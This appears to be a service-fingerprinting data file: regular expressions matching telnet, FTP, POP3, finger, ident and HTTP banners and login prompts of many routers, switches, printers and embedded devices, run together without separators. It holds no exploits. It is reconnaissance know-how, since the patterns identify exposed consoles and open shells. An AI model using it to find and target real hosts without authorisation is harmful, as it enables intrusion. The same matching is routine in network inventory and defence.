s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n +\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD +\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: \d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not 